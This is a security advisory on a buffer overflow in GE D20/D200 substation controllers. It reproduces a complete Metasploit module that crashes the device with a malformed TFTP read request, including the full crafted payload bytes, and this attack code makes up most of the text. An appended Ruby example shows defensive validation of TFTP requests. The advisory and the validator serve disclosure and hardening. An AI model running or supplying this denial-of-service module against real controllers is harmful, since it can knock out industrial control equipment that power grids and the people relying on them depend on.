GE Energy D20/D200 Substation Controller Buffer Overflow Vulnerability
Published: 2012-04-09
Updated: 2012-04-10

Affected systems:
General Electric D20/D200 Substation Controller

Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 52955

The D20/D200 Substation Controller is a gateway between IEDs and the SCADA master, downstream substations and feeders. The General Electric (GE) D20ME is part of the GE D20 Substation Controller product line.

The D20/D200 Substation Controller has a buffer overflow vulnerability in its implementation that can lead to execution of arbitrary code.

<* Source: Reid Wightman
   Link: http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-12-019-01A.pdf *>

Test method:
--------------------------------------------------------------------------------

Warning: the following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

Reid Wightman provided the following test method:

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

##
# The General Electric D20 (and possibly other devices) have numerous
# buffer overruns in their TFTP servers and probably other servers.
# There are many buffer overruns like it, but this one is the D20's
# TFTP Server transfer-mode overflow.
# The filename also suffers from an overrun but seems unlikely to be
# exploitable.
##

require 'msf/core'
require 'rex/ui/text/shell'
require 'rex/proto/tftp'

class Metasploit3 < Msf::Auxiliary

  include Rex::Ui::Text
  include Rex::Proto::TFTP
  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'General Electric D20ME TFTP Server Buffer Overflow DoS',
      'Description'    => %q{
        By sending a malformed TFTP request to the GE D20ME, it is
        possible to crash the device.

        This module is based on the original 'd20ftpbo.rb' Basecamp module
        from DigitalBond.
      },
      'Author'         =>
        [
          'K. Reid Wightman <wightman[at]digitalbond.com>', # original module
          'todb' # Metasploit fixups
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ]
        ],
      'Version'        => '$Revision$',
      'DisclosureDate' => 'Jan 19 2012'
    ))

    register_options(
      [
        OptAddress.new('LHOST', [false, "The local IP address to bind to"]),
        OptInt.new('RECV_TIMEOUT', [false, "Time (in seconds) to wait between packets", 3]),
        Opt::RPORT(69)
      ], self.class)
  end

  def run
    udp_sock = Rex::Socket::Udp.create(
      'LocalHost' => datastore['LHOST'] || nil,
      'PeerHost'  => rhost,
      'PeerPort'  => rport,
      'Context'   => {'Msf' => framework, 'MsfExploit' => self}
    )
    # No need to rescue, it's a UDP faux-socket
    udp_sock.sendto(payload, rhost, rport)
    recv = udp_sock.timed_read(65535, recv_timeout)
    if recv and recv.size > 0
      udp_sock.sendto(payload, rhost, rport)
    else
      print_error "#{rhost}:#{rport} - TFTP - No response from the target, aborting."
      return
    end
    print_good "#{rhost}:#{rport} - TFTP - DoS complete, the D20 should fault after a timeout."
  end

  # Seconds to wait for the first reply; falls back to 3 when unset or zero.
  def recv_timeout
    if datastore['RECV_TIMEOUT'].to_i.zero?
      3
    else
      datastore['RECV_TIMEOUT'].to_i.abs
    end
  end

  # TFTP RRQ (opcode 1) whose transfer-mode field is never NUL-terminated.
  def payload
    "\x00\x01NVRAM\\D20.zlb\x00netascii" +
    "\x80\x80\x80\x80\x80\x80\x80\x81\x80\x80\x80\x82\x80\x80\x80\x83" +
    "\x80\x80\x80\x84\x80\x80\x80\x85\x80\x80\x80\x86\x80\x80\x80\x87\x80\x80\x80\x88" +
    "\x80\x80\x80\x89\x80\x80\x80\x8A\x80\x80\x80\x8B\x80\x80\x80\x8C\x80\x80\x80\x8D" +
    "\x80\x80\x80\x8E\x80\x80\x80\x8F\x80\x80\x80\x90\x80\x80\x80\x91\x80\x80\x80\x92" +
    "\x80\x80\x80\x93\x80\x80\x80\x94\x80\x80\x80\x95\x80\x80\x80\x96\x80\x80\x80\x97" +
    "\x80\x80\x80\x98\x80\x80\x80\x99\x80\x80\x80\x9A\x80\x80\x80\x9B\x80\x80\x80\x9C" +
    "\x80\x80\x80\x9D\x80\x80\x80\x9E\x80\x80\x80\x9F\x80\x80\x80\xA0\x80\x80\x80\xA1" +
    "\x80\x80\x80\xA2\x80\x80\x80\xA3\x80\x80\x80\xA4\x80\x80\x80\xA5\x80\x80\x80\xA6" +
    "\x80\x80\x80\xA7\x80\x80\x80\xA8\x80\x80\x80\x00\x80\x80\x80\xAA\x80\x80\x80\xAB" +
    "\x80\x80\x80\xAC\x80\x80\x80\xAD\x80\x80\x80\xAE\x80\x80\x80\xAF\x80\x80\x80\xB0" +
    "\x80\x80\x80\xB1\x80\x80\x80\xB2\x80\x80\x80\xB3\x80\x80\x80\xB4\x80\x80\x80\xB5" +
    "\x80\x80\x80\xB6\x80\x80\x80\xB7\x80\x80\x80\xB8\x80\x80\x80\xB9\x80\x80\x80\xBA" +
    "\x80\x80\x80\xBB\x80\x80\x80\xBC\x80\x80\x80\xBD\x80\x80\x80\xBE\x80\x80\x80\xBF" +
    "\x80\x80\x80\xC0\x80\x80\x80\xC1\x80\x80\x80\xC2\x80\x80\x80\xC3\x80\x80\x80\xC4" +
    "\x80\x80\x80\xC5\x80\x80\x80\xC6\x80\x80\x80\xC7\x80\x80\x80\xC8\x80\x80\x80\xC9" +
    "\x80\x80\x80\xCA\x80\x80\x80\xCB\x80\x80\x80\xCC\x80\x80\x80\xCD\x80\x80\x80\xCE" +
    "\x80\x80\x80\xCF\x80\x80\x80\xD0\x80\x80\x80\xD1\x80\x80\x80\xD2\x80\x80\x80\xD3" +
    "\x80\x80\x80\xD4\x80\x80\x80\xD5\x80\x80\x80\xD6\x80\x80\x80\xD7\x80\x80\x80\xD8" +
    "\x80\x80\x80\xD9\x80\x80\x80\xDA\x80\x80\x80\xDB\x80\x80\x80\xDC\x80\x80\x80\xDD" +
    "\x80\x80\x80\xDE\x80\x80\x80\x00\x00\x00\x80\x00\x00\x01\x80\xE1\x80\x80\x80\xE2" +
    "\x80\x80\x80\xE3\x80\x80\x80\xE4\x80\x80\x80\xE5\x80\x80\x80\xE6\x80\x80\x80\xE7" +
    "\x80\x80\x80\xE8\x80\x80\x80\xE9\x80\x80\x80\xEA\x80\x80\x80\xEB\x80\x80\x80\xEC" +
    "\x80\x80\x00\x80\x00\x00\x00\x7F\xFF\xBC\x80\xEF\x80\x80\x80\xF0\x80\x80\x80\xF1" +
    "\x80\x80\x80\xF2\x80\x80\x80\xF3\x80\x80\x80\xF4\x80\x80\x80\xF5\x80\x80\x80\xF6" +
    "\x80\x80\x80\xF7\x80\x80\x80\xF8\x80\x80\x80\xF9\x80\x80\x80\xFA\x80\x80\x80\xFB" +
    "\x80\x80\x80\xFC\x80\x80\x80\xFD\x80\x80\x80\xFE\x80\x80\x81\x80\x80\x80\x81\x81" +
    "\x80\x80\x81\x82\x80\x80\x81\x83\x80\x80\x81\x84\x80\x80\x81\x85\x80\x80\x81\x86" +
    "\x80\x80\x81\x87\x80\x80\x81\x88\x80\x80\x81\x89\x80\x80\x81\x8A\x80\x80\x81\x8B" +
    "\x80\x80\x81\x8C\x80\x80\x81\x8D\x80\x80\x81\x8E\x80\x80\x81\x8F\x80\x80\x81\x90" +
    "\x80\x80\x81\x91\x80\x80\x81\x92\x80\x80\x81\x93\x80\x80\x81\x94\x80\x80\x81\x95" +
    "\x80\x80\x81\x96\x80\x80\x81\x97\x80\x80\x81\x98\x80\x80\x81\x99\x80\x80\x81\x9A" +
    "\x80\x80\x81\x9B\x80\x80\x81\x9C\x80\x80\x81\x9D\x80\x80\x81\x9E\x80\x80\x81\x9F" +
    "\x80\x80\x81\xA0\x80\x80\x81\xA1\x80\x80\x81\xA2\x80\x80\x81\xA3\x80\x80\x81\xA4" +
    "\x80\x80\x81\xA5\x80\x80\x81\xA6\x80\x80\x81\xA7\x80\x80\x81\xA8\x80\x80\x81\xA9" +
    "\x80\x80\x81\xAA\x80\x80\x81\xAB\x80\x80\x81\xAC\x80\x80\x81\xAD\x80\x80\x81\xAE" +
    "\x80\x80\x81\xAF\x80\x80\x81\xB0\x80\x80\x81\xB1\x80\x80\x81\xB2\x80\x80\x81\xB3" +
    "\x80\x80\x81\xB4\x80\x80\x81\xB5\x80\x80\x81\xB6\x80\x80\x81\xB7\x80\x80\x81\xB8" +
    "\x80\x80\x81\xB9\x80\x80\x81\xBA\x80\x80\x81\xBB\x80\x80\x81\xBC\x80\x80\x81\xBD" +
    "\x80\x80\x81\xBE\x80\x80\x81\xBF\x80\x80\x81\xC0\x80\x80\x81\xC1\x80\x80\x81\xC2" +
    "\x80\x80\x81\xC3\x80\x80\x81\xC4\x80\x80\x81\xC5\x80\x80\x81\xC6\x80\x80\x81\xC7" +
    "\x80\x80\x81\xC8\x80\x80\x81\xC9\x80\x80\x81\xCA\x80\x80\x81\xCB\x80\x80\x81\xCC" +
    "\x80\x80\x81\xCD\x80\x80\x81\xCE\x80\x80\x81\xCF\x80\x80\x81\xD0\x80\x80\x81\xD1" +
    "\x80\x80\x81\xD2\x80\x80\x81\xD3\x80\x80\x81\xD4\x80\x80\x81\xD5\x80\x80\x81\xD6" +
    "\x80\x80\x81\xD7\x80\x80\x81\xD8\x80\x80\x81\xD9\x80\x80\x81\xDA\x80\x80\x81\xDB" +
    "\x80\x80\x81\xDC\x80\x80\x81\xDD\x80\x80\x81\xDE\x80\x80\x81\xDF\x80\x80\x81\xE0" +
    "\x80\x80\x81\xE1\x80\x80\x81\xE2\x80\x80\x81\xE3\x80\x80\x81\xE4\x80\x80\x81\xE5" +
    "\x80\x80\x81\xE6\x80\x80\x81\xE7\x80\x80\x81\xE8\x80\x80\x81\xE9\x80\x80\x81\xEA" +
    "\x80\x80\x81\xEB\x80\x80\x81\xEC\x80\x80\x81\xED\x80\x80\x81\xEE\x80\x80\x81\xEF" +
    "\x80\x80\x81\xF0\x80\x80\x81\xF1\x80\x80\x81\xF2\x80\x80\x81\xF3\x80\x80\x81\xF4" +
    "\x80\x80\x81\xF5\x80\x80\x81\xF6\x80\x80\x81\xF7\x80\x80\x81\xF8\x80\x80\x81\xF9" +
    "\x80\x80\x81\xFA\x80\x80\x81\xFB\x80\x80\x81\xFC\x80\x80\x81\xFD\x80\x80\x81\xFE" +
    "\x80\x80\x82\x80\x80\x80\x82\x81"
  end
end

Recommendations:
--------------------------------------------------------------------------------
Vendor patch:

General Electric
----------------
The vendor has not yet released a patch or upgrade. Users of this product are advised to watch the vendor's home page for the latest version:
http://www.ge-ip.com/products/2420
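As an added example that is not part of this advisory or of the Metasploit module above, the following Ruby shows the request validation a TFTP server needs in order to avoid the class of overrun described here: both NUL-terminated fields are located without scanning past the datagram, and the transfer mode is bounded and matched against the RFC 1350 modes before anything is copied. The buffer limits and the sample datagrams are assumed and constructed values, not the D20's.

```ruby
# Added example, not from the advisory or the Metasploit module above: a strict
# RFC 1350 RRQ/WRQ parser of the kind a hardened TFTP server (or a probe in
# front of one) should run before copying the filename or transfer mode into a
# fixed-size buffer. The length limits are assumptions, not the D20's real
# buffer sizes. Returns [:ok, filename, mode] or [:reject, reason].
TFTP_RRQ = 1
TFTP_WRQ = 2
TFTP_MODES = %w[netascii octet mail].freeze
MAX_FILENAME = 128 # assumed bound
MAX_MODE     = 8   # "netascii" is the longest legal mode string

def check_tftp_request(datagram, max_filename: MAX_FILENAME, max_mode: MAX_MODE)
  pkt = datagram.b # work on raw bytes whatever the source encoding
  return [:reject, "short packet"] if pkt.bytesize < 4
  opcode = pkt.unpack1("n")
  return [:reject, "opcode #{opcode} is not RRQ/WRQ"] unless [TFTP_RRQ, TFTP_WRQ].include?(opcode)

  # Locate both NUL terminators without scanning past the datagram; an
  # unterminated field is exactly what drives a naive strcpy-style copy off
  # the end of the server's buffer.
  fields = []
  pos = 2
  %w[filename mode].each do |name|
    nul = pkt.index("\x00", pos)
    return [:reject, "#{name} not NUL-terminated"] if nul.nil?
    fields << pkt.byteslice(pos, nul - pos)
    pos = nul + 1
  end
  filename, mode = fields

  return [:reject, "empty filename"] if filename.empty?
  return [:reject, "filename too long (#{filename.bytesize} bytes)"] if filename.bytesize > max_filename
  return [:reject, "mode too long (#{mode.bytesize} bytes)"] if mode.bytesize > max_mode
  return [:reject, "unknown mode #{mode.inspect}"] unless TFTP_MODES.include?(mode.downcase)
  # RFC 2347 options are not supported here, so bytes after the mode terminator
  # are treated as malformed rather than parsed.
  return [:reject, "#{pkt.bytesize - pos} trailing bytes after mode"] if pos != pkt.bytesize
  [:ok, filename, mode.downcase]
end

def tftp_request_ok?(datagram)
  check_tftp_request(datagram).first == :ok
end

# Constructed sample datagrams (not captured traffic). UNTERMINATED_MODE has the
# shape of the advisory's request: a valid-looking mode with no NUL, running
# straight into filler bytes.
GOOD_RRQ = "\x00\x01boot.bin\x00OCTET\x00".b
UNTERMINATED_MODE = "\x00\x01boot.bin\x00netascii".b + "\x80".b * 64
OVERLONG_MODE = "\x00\x02boot.bin\x00netascii".b + "A" * 24 + "\x00".b
```

A server that handles RFC 2347 options would parse the trailing bytes as further NUL-terminated name/value pairs instead of rejecting them, applying the same bounded scan to each.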